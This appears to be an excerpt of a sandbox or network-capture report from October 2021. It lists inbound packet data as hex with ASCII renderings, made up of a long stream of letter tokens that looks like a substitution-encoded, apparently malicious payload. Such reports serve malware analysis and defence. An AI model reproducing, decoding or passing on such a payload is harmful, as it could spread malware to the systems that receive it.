2021-10-29 18:50:00 UTC	161	IN	Data Raw: 58 6d 20 71 71 6d 20 4a 6d 70 20 71 4f 71 20 71 4f 44 20 6d 4d 20 45 58 20 70 45 20 71 6d 71 20 58 57 20 4a 4f 57 20 4a 71 71 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 4f 20 44 4a 20 71 71 4d 20 71 71 70 20 4a 57 70 20 71 4a 4a 20 4a 4f 70 20 57 71 20 4a 6d 58 20 71 6d 58 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 4a 4f 20 4a 57 4f 20 57 4a 20 71 4f 4a 20 70 70 20 4a 70 4a 20 71 71 57 20 71 44 57 20 4a 4f 70 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 4d 4a 20 71 44 70 20 71 71 70 20 57 71 20 71 4f 70 20 71 6d 4a 20 6d 4d 20 4a 70 57 20 71 6d 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 44 20 57 58 20 4a 58 20 57 70 20 45 4a 20 44 45 20 4a 4f 45 20 71 71 44 20 71 6d 4f 20 4a 71 6d 20 57 4f 20 6d 58 20 57 4f Data Ascii: Xm qqm Jmp qOq qOD mM EX pE qmq XW JOW Jqq qOM qqJ WO mX qXO DJ qqM qqp JWp qJJ JOp Wq JmX qmX Wm Xm qqm qqE JpW qJO JWO WJ qOJ pp JpJ qqW qDW JOp qqJ WO mX WO qED MJ qDp qqp Wq qOp qmJ mM JpW qmm Xm qqm qqE qOM JmD WX JX Wp EJ DE JOE qqD qmO Jqm WO mX WO
2021-10-29 18:50:00 UTC	165	IN	Data Raw: 20 71 45 44 20 45 44 20 4a 57 4f 20 44 57 20 71 4f 58 20 71 71 4a 20 4a 4f 58 20 6d 4d 20 4a 45 20 71 57 44 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 70 20 57 4f 20 71 70 4f 20 6d 4d 20 4d 58 20 44 45 20 71 6d 6d 20 71 71 44 20 4d 71 20 4a 71 58 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 4a 71 57 20 71 71 6d 20 4a 70 4d 20 71 4f 71 20 71 58 4d 20 70 45 20 4a 71 4f 20 57 71 20 71 71 45 20 4a 57 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 45 45 20 6d 58 20 71 6d 4a 20 57 58 20 71 70 71 20 71 4f 71 20 71 57 71 20 71 4f 58 20 70 4a 20 71 57 4a 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 4a 6d 71 20 71 71 45 20 44 45 20 71 4a 45 20 4a 71 71 20 70 4d 20 4a 4f 58 20 57 57 20 4d 20 4a 71 44 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 44 71 Data Ascii: qED ED JWO DW qOX qqJ JOX mM JE qWD Xm qqm qqE qOM Jmp WO qpO mM MX DE qmm qqD Mq JqX WO mX WO Wm JqW qqm JpM qOq qXM pE JqO Wq qqE JWm qqm qqE qOM qqJ qEE mX qmJ WX qpq qOq qWq qOX pJ qWJ mX WO Wm Xm Jmq qqE DE qJE Jqq pM JOX WW M JqD qqE qOM qqJ WO qDq
2021-10-29 18:50:00 UTC	169	IN	Data Raw: 20 4a 4f 6d 20 6d 4d 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 44 58 20 71 71 70 20 57 4a 20 58 6d 20 71 71 57 20 71 71 45 20 4a 44 20 4d 4a 20 57 4f 20 71 44 20 6d 58 20 57 6d 20 58 4a 20 71 4f 57 20 71 71 45 20 45 45 20 71 71 57 20 57 4f 20 71 4d 44 20 70 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 4a 57 6d 20 45 4a 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 71 4f 20 4d 6d 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 45 71 20 71 4f 20 57 6d 20 58 6d 20 71 71 57 20 71 71 45 20 4d 4a 20 57 4f 20 57 4f 20 6d 58 20 6d 58 20 57 6d 20 4a 6d 4a 20 57 4f 20 71 71 45 20 71 4f 4d 20 71 71 57 20 57 4f 20 71 45 6d 20 71 71 6d 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 70 4d 20 44 6d 20 57 4f 20 6d 58 20 57 57 20 57 6d 20 71 4a 45 20 71 4f 6d 20 Data Ascii: JOm mM qqE qOM qqp WO qDX qqp WJ Xm qqW qqE JD MJ WO qD mX Wm XJ qOW qqE EE qqW WO qMD pq Wm Xm qqX qqE JWm EJ WO mX Wq Wm JqO Mm qqE qOM qqm WO qEq qO Wm Xm qqW qqE MJ WO WO mX mX Wm JmJ WO qqE qOM qqW WO qEm qqm Wm Xm qqX qqE pM Dm WO mX WW Wm qJE qOm
2021-10-29 18:50:00 UTC	173	IN	Data Raw: 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 Data Ascii: OM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO q
2021-10-29 18:50:00 UTC	176	IN	Data Raw: 4f 20 70 45 20 71 4d 20 57 6d 20 58 6d 20 71 71 4a 20 71 71 45 20 44 44 20 58 71 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 70 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 4a 71 20 71 44 20 57 6d 20 58 6d 20 71 71 4a 20 71 71 45 20 44 4a 20 6d 4d 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 4f 57 20 6d 58 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 4a 45 20 4a 71 20 57 6d 20 58 6d 20 71 71 57 20 71 71 45 20 44 4f 20 57 71 20 70 6d 20 70 4a 20 6d 58 20 57 6d 20 4a 70 6d 20 58 4d 20 71 4f 71 20 71 4a 57 20 71 71 57 20 57 4f 20 4a 6d 45 20 4a 57 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 45 58 20 45 71 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 6d 4d 20 4d 71 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 57 45 20 4a 45 20 57 6d 20 58 6d Data Ascii: O pE qM Wm Xm qqJ qqE DD Xq WO mX Wq Wm p qqX qqE qOM qqp WO Jq qD Wm Xm qqJ qqE DJ mM WO mX Wq Wm JOW mX qqE qOM qqm WO qJE Jq Wm Xm qqW qqE DO Wq pm pJ mX Wm Jpm XM qOq qJW qqW WO JmE JW Wm Xm qqX qqE EX Eq WO mX Wq Wm JmM Mq qqE qOM qqp WO qWE JE Wm Xm
2021-10-29 18:50:00 UTC	180	IN	Data Raw: 20 6d 58 20 6d 58 20 57 6d 20 57 6d 20 71 4f 4f 20 6d 58 20 71 71 45 20 71 4f 4d 20 71 71 45 20 57 4f 20 45 20 71 57 20 57 6d 20 58 6d 20 71 71 44 20 71 71 45 20 45 4f 20 45 45 20 57 4f 20 6d 58 20 57 70 20 57 6d 20 4a 6d 4a 20 57 4f 20 71 71 45 20 71 4f 4d 20 71 4a 4f 20 57 4f 20 71 45 6d 20 71 71 6d 20 57 6d 20 58 6d 20 71 4a 70 20 71 71 45 20 4a 57 6d 20 45 4a 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 71 4f 20 4d 6d 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 71 70 20 71 71 4a 20 57 6d 20 71 71 44 20 71 71 70 20 71 71 45 20 71 4d 57 20 58 4a 20 6d 58 20 6d 58 20 57 6d 20 57 6d 20 71 4f 4f 20 6d 58 20 71 71 45 20 71 4f 4d 20 71 71 45 20 57 4f 20 45 20 71 57 20 57 6d 20 58 6d 20 71 71 44 20 71 71 45 20 45 4f 20 45 45 20 57 4f 20 6d 58 20 57 70 20 Data Ascii: mX mX Wm Wm qOO mX qqE qOM qqE WO E qW Wm Xm qqD qqE EO EE WO mX Wp Wm JmJ WO qqE qOM qJO WO qEm qqm Wm Xm qJp qqE JWm EJ WO mX Wq Wm JqO Mm qqE qOM qqm WO qqp qqJ Wm qqD qqp qqE qMW XJ mX mX Wm Wm qOO mX qqE qOM qqE WO E qW Wm Xm qqD qqE EO EE WO mX Wp
2021-10-29 18:50:00 UTC	184	IN	Data Raw: 20 4a 4a 20 71 45 20 4d 6d 20 57 6d 20 4a 70 71 20 58 44 20 71 4a 4f 20 4d 4a 20 4a 57 20 71 71 44 20 71 6d 45 20 57 71 20 57 44 20 70 71 20 70 4a 20 71 71 58 20 71 58 57 20 71 4f 4d 20 4a 70 71 20 71 70 20 71 45 58 20 57 6d 20 4a 4f 45 20 58 6d 20 4a 57 4f 20 44 57 20 71 4f 58 20 71 71 4a 20 4a 6d 70 20 57 4f 20 71 6d 4a 20 70 71 20 4a 71 6d 20 71 71 58 20 71 71 44 20 71 71 4f 20 44 45 20 70 20 71 58 58 20 57 6d 20 4a 4f 45 20 58 6d 20 71 45 4f 20 71 4f 6d 20 4a 57 4a 20 71 71 44 20 4d 4d 20 6d 58 20 57 44 20 70 71 20 71 57 45 20 71 71 6d 20 71 4d 44 20 71 71 4f 20 4a 6d 58 20 44 20 70 4a 20 57 4f 20 71 6d 70 20 58 45 20 44 4f 20 6d 4d 20 4a 4f 45 20 71 71 44 20 4a 57 71 20 57 71 20 71 58 44 20 4a 20 4a 57 70 20 71 71 58 20 71 44 71 20 71 4f 4d 20 4a 6d Data Ascii: JJ qE Mm Wm Jpq XD qJO MJ JW qqD qmE Wq WD pq pJ qqX qXW qOM Jpq qp qEX Wm JOE Xm JWO DW qOX qqJ Jmp WO qmJ pq Jqm qqX qqD qqO DE p qXX Wm JOE Xm qEO qOm JWJ qqD MM mX WD pq qWE qqm qMD qqO JmX D pJ WO qmp XE DO mM JOE qqD JWq Wq qXD J JWp qqX qDq qOM Jm
2021-10-29 18:50:00 UTC	188	IN	Data Raw: 57 20 58 6d 20 44 4a 20 4a 4a 70 20 58 57 20 4d 57 20 71 4f 44 20 44 20 71 4a 6d 20 4a 57 6d 20 6d 4d 20 71 4f 6d 20 71 58 20 58 4d 20 71 71 44 20 71 58 57 20 71 4f 58 20 4a 44 20 71 57 20 6d 4a 20 57 4a 20 4a 70 20 58 44 20 4a 57 4f 20 44 57 20 71 45 58 20 71 4a 70 20 4a 70 4f 20 6d 4d 20 45 71 20 4a 4a 20 4a 4f 71 20 71 4a 44 20 71 6d 4f 20 71 4f 58 20 4a 6d 58 20 44 20 6d 4d 20 57 4f 20 6d 45 20 58 71 20 71 45 20 4d 70 20 4a 4a 4a 20 71 4a 6d 20 71 4d 57 20 6d 4d 20 71 4f 70 20 71 45 20 4a 70 45 20 71 4a 44 20 71 6d 4f 20 71 4f 58 20 71 70 45 20 71 71 57 20 4a 6d 70 20 44 4a 20 71 57 71 20 58 45 20 71 44 44 20 58 44 20 58 58 20 71 71 6d 20 4a 70 58 20 6d 4d 20 71 58 44 20 4a 20 70 4a 20 71 71 6d 20 71 6d 57 20 71 4f 58 20 4a 6d 58 20 44 20 44 58 20 57 Data Ascii: W Xm DJ JJp XW MW qOD D qJm JWm mM qOm qX XM qqD qXW qOX JD qW mJ WJ Jp XD JWO DW qEX qJp JpO mM Eq JJ JOq qJD qmO qOX JmX D mM WO mE Xq qE Mp JJJ qJm qMW mM qOp qE JpE qJD qmO qOX qpE qqW Jmp DJ qWq XE qDD XD XX qqm JpX mM qXD J pJ qqm qmW qOX JmX D DX W
2021-10-29 18:50:00 UTC	192	IN	Data Raw: 71 4a 57 20 71 4a 6d 20 71 4f 45 20 71 4d 57 20 57 4f 20 4a 70 4d 20 6d 4f 20 4a 70 20 58 4a 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 45 20 57 6d 20 71 6d 57 20 57 6d 20 71 4a 4a 20 71 71 71 20 4d 4a 20 71 4f 45 20 71 4d 57 20 57 4f 20 71 4d 4a 20 6d 4f 20 71 71 4d 20 58 4a 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 71 70 20 57 6d 20 71 6d 57 20 57 6d 20 71 20 71 71 71 20 44 4f 20 71 4f 45 20 71 4d 57 20 57 4f 20 6d 4d 20 6d 71 20 58 45 20 58 4a 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 58 71 20 57 6d 20 71 6d 57 20 57 6d 20 6d 4f 20 71 71 71 20 4a 58 20 71 4f 45 20 71 4d 57 20 57 4f 20 71 6d 20 6d 4f 20 71 58 70 20 58 4a 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 45 45 20 57 6d 20 71 6d 57 20 57 6d 20 4a 6d 4f 20 71 71 71 Data Ascii: qJW qJm qOE qMW WO JpM mO Jp XJ mM qqE qWW qJE qE Wm qmW Wm qJJ qqq MJ qOE qMW WO qMJ mO qqM XJ mM qqE qWW qJE qqp Wm qmW Wm q qqq DO qOE qMW WO mM mq XE XJ mM qqE qWW qJE Xq Wm qmW Wm mO qqq JX qOE qMW WO qm mO qXp XJ mM qqE qWW qJE qEE Wm qmW Wm JmO qqq
2021-10-29 18:50:00 UTC	196	IN	Data Raw: 57 20 71 6d 4d 20 71 71 4a 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 57 6d 20 45 6d 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 58 20 6d 44 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 57 70 20 71 71 57 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 58 44 20 45 6d 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 45 58 20 6d 44 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 71 58 71 20 71 71 57 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 4a 71 6d 20 45 6d 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 58 4a 20 6d 45 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 4a 6d 57 20 71 71 6d 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 71 57 4f 20 45 57 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 4a 6d 4a 20 6d 45 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a Data Ascii: W qmM qqJ Wq WO qMX Dq Wm Em mM qqE qWW qJE qX mD qqp Wm qDJ qJW Wp qqW Wq WO qMX Dq XD Em mM qqE qWW qJE qEX mD qqp Wm qDJ qJW qXq qqW Wq WO qMX Dq Jqm Em mM qqE qWW qJE XJ mE qqp Wm qDJ qJW JmW qqm Wq WO qMX Dq qWO EW mM qqE qWW qJE JmJ mE qqp Wm qDJ qJ
2021-10-29 18:50:00 UTC	200	IN	Data Raw: 57 57 20 71 4a 45 20 71 71 6d 20 4d 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 4a 71 20 58 6d 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 71 58 4a 20 71 4f 4d 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 6d 44 20 4d 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 71 58 71 20 58 6d 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 4a 71 6d 20 71 4f 4d 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 58 20 71 4f 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 57 70 20 58 45 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 71 58 4a 20 4a 71 20 4a 4a 57 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 6d 44 20 71 71 70 20 71 44 71 20 57 6d 20 71 44 4a 20 71 4a 57 20 71 6d 4d 20 6d 6d 20 4a 4a 45 20 57 4f 20 71 4d 58 20 44 71 20 57 6d 20 4a 4a 20 4a 4a 57 20 71 71 45 20 Data Ascii: WW qJE qqm M qqp Wm qDJ qJW Jq Xm Wq WO qMX Dq qXJ qOM mM qqE qWW qJE qmD M qqp Wm qDJ qJW qXq Xm Wq WO qMX Dq Jqm qOM mM qqE qWW qJE qX qO qqp Wm qDJ qJW Wp XE Wq WO qMX Dq qXJ Jq JJW qqE qWW qJE qmD qqp qDq Wm qDJ qJW qmM mm JJE WO qMX Dq Wm JJ JJW qqE
2021-10-29 18:50:00 UTC	204	IN	Data Raw: 4d 20 71 71 4a 20 4a 6d 70 20 57 44 20 71 57 57 20 6d 45 20 58 6d 20 71 71 6d 20 44 71 20 71 4f 4a 20 58 70 20 6d 70 20 6d 58 20 57 4f 20 71 4f 71 20 58 4f 20 58 71 20 71 4f 58 20 71 4f 4d 20 71 71 4a 20 4a 70 44 20 57 6d 20 71 45 20 6d 45 20 58 6d 20 71 71 6d 20 71 58 4f 20 71 4f 71 20 58 70 20 6d 70 20 6d 58 20 57 4f 20 71 4a 44 20 4d 57 20 58 71 20 71 4f 58 20 71 4f 4d 20 71 71 4a 20 4a 71 57 20 44 4f 20 71 45 20 6d 45 20 58 6d 20 71 71 6d 20 57 4f 20 4d 4d 20 58 70 20 6d 70 20 6d 58 20 57 4f 20 71 71 70 20 4d 71 20 4a 4a 71 20 71 4f 58 20 71 4f 4d 20 71 71 4a 20 71 4f 45 20 70 70 20 71 45 20 6d 45 20 58 6d 20 71 71 6d 20 71 44 4f 20 71 4a 6d 20 58 70 20 6d 70 20 6d 58 20 57 4f 20 4a 4d 20 58 6d 20 58 71 20 71 4f 58 20 71 4f 4d 20 71 71 4a 20 4a 71 20 Data Ascii: M qqJ Jmp WD qWW mE Xm qqm Dq qOJ Xp mp mX WO qOq XO Xq qOX qOM qqJ JpD Wm qE mE Xm qqm qXO qOq Xp mp mX WO qJD MW Xq qOX qOM qqJ JqW DO qE mE Xm qqm WO MM Xp mp mX WO qqp Mq JJq qOX qOM qqJ qOE pp qE mE Xm qqm qDO qJm Xp mp mX WO JM Xm Xq qOX qOM qqJ Jq
2021-10-29 18:50:00 UTC	208	IN	Data Raw: 6d 20 71 4d 71 20 71 4f 58 20 4a 4f 45 20 57 4f 20 6d 4d 20 57 4f 20 4a 57 70 20 58 57 20 4a 4f 57 20 71 71 45 20 71 71 71 20 71 71 4a 20 4a 57 6d 20 6d 4d 20 4a 6d 70 20 57 6d 20 58 57 20 71 71 6d 20 71 58 6d 20 71 4f 58 20 71 45 45 20 57 4f 20 57 4f 20 57 4f 20 4a 6d 58 20 58 57 20 71 45 45 20 71 71 45 20 71 4f 58 20 71 71 4a 20 4a 57 70 20 6d 4d 20 4a 6d 71 20 57 6d 20 58 44 20 71 71 6d 20 71 44 6d 20 71 4f 58 20 71 58 71 20 57 4f 20 6d 4d 20 57 4f 20 4a 4a 58 20 58 57 20 71 58 70 20 71 71 45 20 71 71 71 20 71 71 4a 20 44 71 20 57 4f 20 4a 6d 57 20 57 6d 20 58 44 20 71 71 6d 20 71 4f 4f 20 71 71 71 20 71 58 57 20 57 4f 20 57 6d 20 57 4f 20 70 4f 20 58 6d 20 4d 45 20 71 71 45 20 57 4d 20 71 71 4a 20 6d 4f 20 57 4a 20 70 45 20 57 6d 20 4a 20 71 71 6d 20 Data Ascii: m qMq qOX JOE WO mM WO JWp XW JOW qqE qqq qqJ JWm mM Jmp Wm XW qqm qXm qOX qEE WO WO WO JmX XW qEE qqE qOX qqJ JWp mM Jmq Wm XD qqm qDm qOX qXq WO mM WO JJX XW qXp qqE qqq qqJ Dq WO JmW Wm XD qqm qOO qqq qXW WO Wm WO pO Xm ME qqE WM qqJ mO WJ pE Wm J qqm
2021-10-29 18:50:00 UTC	212	IN	Data Raw: 6d 20 71 71 70 20 71 71 6d 20 6d 4f 20 71 4f 4d 20 58 45 20 57 4f 20 71 71 4f 20 57 4f 20 71 71 57 20 58 6d 20 6d 57 20 71 71 45 20 6d 4f 20 71 71 4a 20 58 4a 20 6d 58 20 71 71 4d 20 57 6d 20 57 70 20 71 71 6d 20 6d 58 20 71 4f 4d 20 71 58 20 57 4f 20 71 71 45 20 57 4f 20 58 57 20 58 6d 20 57 57 20 71 71 45 20 4d 20 71 71 4a 20 71 71 4d 20 6d 58 20 58 45 20 57 6d 20 71 45 20 71 71 6d 20 71 4d 20 71 4f 4d 20 57 70 20 57 4f 20 58 45 20 57 4f 20 71 71 57 20 58 6d 20 4a 44 20 71 71 45 20 6d 4f 20 71 71 4a 20 4d 71 20 6d 58 20 71 71 4d 20 57 6d 20 44 4a 20 71 71 6d 20 6d 58 20 71 4f 4d 20 4a 45 20 57 4f 20 71 71 45 20 57 4f 20 4d 4f 20 58 6d 20 57 57 20 71 71 45 20 4f 20 71 71 4a 20 71 71 4d 20 6d 58 20 4d 4a 20 57 6d 20 71 45 20 71 71 6d 20 4a 44 20 71 4f 4d Data Ascii: m qqp qqm mO qOM XE WO qqO WO qqW Xm mW qqE mO qqJ XJ mX qqM Wm Wp qqm mX qOM qX WO qqE WO XW Xm WW qqE M qqJ qqM mX XE Wm qE qqm qM qOM Wp WO XE WO qqW Xm JD qqE mO qqJ Mq mX qqM Wm DJ qqm mX qOM JE WO qqE WO MO Xm WW qqE O qqJ qqM mX MJ Wm qE qqm JD qOM
2021-10-29 18:50:00 UTC	223	IN	Data Raw: 20 4d 45 20 44 58 20 58 70 20 44 44 20 44 71 20 71 45 20 57 4a 20 70 71 20 4a 20 58 70 20 45 70 20 71 4a 70 20 58 58 20 44 71 20 44 20 70 70 20 4a 4f 20 4f 20 58 45 20 4d 4d 20 4d 71 20 45 44 20 6d 4d 20 45 4d 20 44 58 20 4d 71 20 71 71 4a 20 58 57 20 58 57 20 45 4f 20 71 4f 57 20 4a 4d 20 4a 4a 20 44 58 20 4d 71 20 71 71 4a 20 44 57 20 58 57 20 45 4f 20 71 4f 57 20 4a 4d 20 4a 4a 20 44 58 20 4d 71 20 71 71 4a 20 71 71 4d 20 4d 6d 20 45 4f 20 4d 57 20 70 4a 20 71 71 20 44 58 20 4d 71 20 71 71 4a 20 44 20 71 20 4a 20 71 71 6d 20 4d 45 20 45 71 20 44 58 20 6d 45 20 57 6d 20 71 71 20 71 71 44 20 71 71 70 20 45 20 71 58 20 44 44 20 57 6d 20 6d 70 20 44 44 20 6d 20 4a 20 71 71 4d 20 4a 20 71 44 20 6d 58 20 44 58 20 4d 70 20 45 71 20 57 20 45 20 71 71 20 70 20 Data Ascii: ME DX Xp DD Dq qE WJ pq J Xp Ep qJp XX Dq D pp JO O XE MM Mq ED mM EM DX Mq qqJ XW XW EO qOW JM JJ DX Mq qqJ DW XW EO qOW JM JJ DX Mq qqJ qqM Mm EO MW pJ qq DX Mq qqJ D q J qqm ME Eq DX mE Wm qq qqD qqp E qX DD Wm mp DD m J qqM J qD mX DX Mp Eq W E qq p
2021-10-29 18:50:00 UTC	228	IN	Data Raw: 4f 20 71 71 4d 20 6d 20 71 71 57 20 71 20 71 4f 71 20 44 44 20 57 71 20 58 6d 20 44 58 20 70 20 4f 20 71 71 44 20 71 71 4a 20 71 45 20 6d 4d 20 6d 58 20 6d 6d 20 57 6d 20 6d 20 71 20 70 20 44 20 4a 71 20 44 44 20 44 58 20 58 6d 20 44 44 20 4f 20 71 71 6d 20 57 4f 20 71 71 6d 20 71 58 20 44 6d 20 57 57 20 6d 71 20 57 71 20 71 20 4d 20 57 20 70 20 71 44 20 6d 4d 20 45 71 20 58 58 20 57 4f 20 71 71 44 20 71 71 70 20 71 71 44 20 71 71 4a 20 4a 71 20 45 4f 20 45 44 20 4d 4f 20 45 4f 20 71 71 4d 20 4d 20 71 71 70 20 71 71 6d 20 71 4f 71 20 57 57 20 45 4f 20 58 57 20 6d 4d 20 71 71 57 20 71 71 44 20 71 71 44 20 4a 20 4d 58 20 44 57 20 57 57 20 71 4f 4d 20 45 70 20 71 71 58 20 4d 20 71 71 57 20 71 71 4a 20 71 4f 70 20 57 71 20 6d 58 20 4d 4a 20 44 57 20 71 71 57 Data Ascii: O qqM m qqW q qOq DD Wq Xm DX p O qqD qqJ qE mM mX mm Wm m q p D Jq DD DX Xm DD O qqm WO qqm qX Dm WW mq Wq q M W p qD mM Eq XX WO qqD qqp qqD qqJ Jq EO ED MO EO qqM M qqp qqm qOq WW EO XW mM qqW qqD qqD J MX DW WW qOM Ep qqX M qqW qqJ qOp Wq mX MJ DW qqW
2021-10-29 18:50:00 UTC	244	IN	Data Raw: 58 58 20 57 71 20 71 71 6d 20 70 58 20 4a 4f 20 70 20 45 4f 20 58 57 20 4d 57 20 4a 6d 20 71 44 20 4f 20 4a 4f 20 4a 44 20 4a 57 20 4d 4a 20 58 45 20 57 4f 20 71 71 45 20 57 4d 20 4a 58 20 70 20 58 20 4a 20 45 4f 20 71 4f 4f 20 4d 70 20 4d 4d 20 4a 6d 20 4a 4d 20 4a 45 20 71 4f 20 71 71 4a 20 4d 6d 20 4d 57 20 58 57 20 57 6d 20 70 4d 20 71 45 20 4a 4f 20 70 20 70 4f 20 58 45 20 44 44 20 71 71 57 20 44 58 20 57 71 20 71 71 6d 20 70 58 20 58 20 71 45 20 44 6d 20 58 70 20 4d 4f 20 57 6d 20 4a 57 20 71 4d 20 71 20 71 6d 20 4a 6d 20 57 4f 20 71 71 4d 20 58 45 20 44 44 20 4a 57 20 4a 4a 20 44 6d 20 70 45 20 71 45 20 44 57 20 58 58 20 57 4f 20 71 71 45 20 57 4d 20 70 71 20 57 20 4a 6d 20 6d 20 58 45 20 71 4a 4f 20 58 70 20 44 4d 20 44 4f 20 71 71 6d 20 57 44 20 Data Ascii: XX Wq qqm pX JO p EO XW MW Jm qD O JO JD JW MJ XE WO qqE WM JX p X J EO qOO Mp MM Jm JM JE qO qqJ Mm MW XW Wm pM qE JO p pO XE DD qqW DX Wq qqm pX X qE Dm Xp MO Wm JW qM q qm Jm WO qqM XE DD JW JJ Dm pE qE DW XX WO qqE WM pq W Jm m XE qJO Xp DM DO qqm WD
2021-10-29 18:50:00 UTC	255	IN	Data Raw: 4a 20 4a 4d 20 4a 4f 20 4d 6d 20 71 4f 44 20 57 20 4a 20 71 57 20 4a 70 20 4a 70 20 45 20 4a 57 20 4a 57 20 58 6d 20 58 4d 20 58 71 20 58 45 20 70 4a 20 4a 70 20 44 20 71 4f 4d 20 70 6d 20 58 45 20 4d 4a 20 58 45 20 58 45 20 70 4d 20 4a 70 20 70 4a 20 4a 4d 20 4a 4f 20 58 70 20 44 58 20 58 45 20 44 4d 20 58 6d 20 70 70 20 71 20 70 71 20 4a 57 20 44 44 20 4d 45 20 45 71 20 58 4d 20 70 4a 20 4a 70 20 44 20 71 4f 4d 20 57 6d 20 44 6d 20 4d 57 20 4d 57 20 71 4a 70 20 44 71 20 4a 58 20 4f 20 4a 57 20 4a 71 20 44 57 20 6d 58 20 71 4f 4d 20 58 4f 20 44 71 20 70 4f 20 71 44 20 6d 45 20 4d 20 45 4f 20 58 57 20 44 57 20 57 6d 20 70 20 4f 20 4a 58 20 4a 57 20 4a 71 20 71 71 57 20 4d 4a 20 4d 6d 20 71 71 44 20 6d 57 20 44 20 71 44 20 70 4f 20 71 71 4a 20 71 71 70 20 Data Ascii: J JM JO Mm qOD W J qW Jp Jp E JW JW Xm XM Xq XE pJ Jp D qOM pm XE MJ XE XE pM Jp pJ JM JO Xp DX XE DM Xm pp q pq JW DD ME Eq XM pJ Jp D qOM Wm Dm MW MW qJp Dq JX O JW Jq DW mX qOM XO Dq pO qD mE M EO XW DW Wm p O JX JW Jq qqW MJ Mm qqD mW D qD pO qqJ qqp
